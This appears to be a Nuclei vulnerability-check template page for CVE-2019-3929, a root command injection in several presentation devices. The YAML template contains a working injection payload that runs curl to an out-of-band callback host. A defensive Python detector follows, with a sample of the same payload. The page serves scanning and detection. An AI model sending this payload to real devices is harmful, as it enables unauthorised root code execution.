Barco/AWIND OEM Presentation Platform - Remote Command Injection
ID: CVE-2019-3929
Severity: critical
Author: _0xf4n9x_
Tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron
Description
The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
YAML Source
id: CVE-2019-3929

info:
  name: Barco/AWIND OEM Presentation Platform - Remote Command Injection
  author: _0xf4n9x_
  severity: critical
  description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
    - https://www.exploit-db.com/exploits/46786/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3929
    - https://www.tenable.com/security/research/tra-2019-20
    - http://packetstormsecurity.com/files/155948/Barco-WePresent-file_transfer.cgi-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-3929
    cwe-id: CWE-78,CWE-79
    epss-score: 0.97363
    epss-percentile: 0.99899
    cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: crestron
    product: am-100_firmware
  tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/file_transfer.cgi"

    body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

Guide to check the vulnerabilities
This Nuclei template checks for the vulnerability by posting the request above to /cgi-bin/file_transfer.cgi and matching on the out-of-band (interactsh) HTTP callback that the injected curl command produces; a callback means the command ran on the device. Run it against a target with the Nuclei tool:
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-3929.yaml"
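The template only tells you whether a device is exploitable. For defenders who also want to recognise the same probe in their own request logs or at a WAF, here is an added request-level check (my own example code, not part of the template or the Nuclei project). It assumes request bodies are available for inspection; the sample requests, including the dummy EXAMPLE-OAST-HOST standing in for {{interactsh-url}}, are constructed.

```python
"""Detector for CVE-2019-3929 exploitation attempts at the request level.
Flags POST requests to /cgi-bin/file_transfer.cgi whose `dir` parameter carries
shell metacharacters or the literal Pa_Note token the template above uses; a
real directory name needs neither. Sample traffic below is constructed."""
import re
from urllib.parse import parse_qs, urlparse

TARGET_PATH = "/cgi-bin/file_transfer.cgi"
# Characters that can break out of a shell-quoted argument; the public
# template uses a single quote, the rest cover common variants.
SHELL_META = re.compile(r"""['"`;|&$<>\n\r]""")
SPACE_TOKEN = "Pa_Note"  # literal from the template body on this page


def inspect_request(method, path, body):
    """Return a reason string if the request looks like an injection attempt, else None."""
    if method.upper() != "POST" or urlparse(path).path != TARGET_PATH:
        return None
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes values
    for value in params.get("dir", []):
        if SPACE_TOKEN in value:
            return f"dir contains {SPACE_TOKEN} token: {value!r}"
        if SHELL_META.search(value):
            return f"dir contains shell metacharacter: {value!r}"
    return None


def triage(requests):
    """Run inspect_request over (method, path, body) tuples; return (path, reason) hits."""
    hits = []
    for method, path, body in requests:
        reason = inspect_request(method, path, body)
        if reason:
            hits.append((path, reason))
    return hits


# Constructed samples: the first body is the template payload with the
# {{interactsh-url}} placeholder replaced by a dummy host.
SAMPLE_REQUESTS = [
    ("POST", TARGET_PATH,
     "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bEXAMPLE-OAST-HOSTPa_Note%27"),
    ("POST", TARGET_PATH, "file_transfer=new&dir=shared"),  # benign
    ("POST", TARGET_PATH, "file_transfer=new&dir=a%3Bid"),  # ';' variant
    ("GET", "/index.html", ""),
]

if __name__ == "__main__":
    for path, reason in triage(SAMPLE_REQUESTS):
        print(path, reason)
```

The check is deliberately narrow (one endpoint, one parameter) so it can run inline without false positives on normal file-transfer traffic; the vendor patch remains the actual fix.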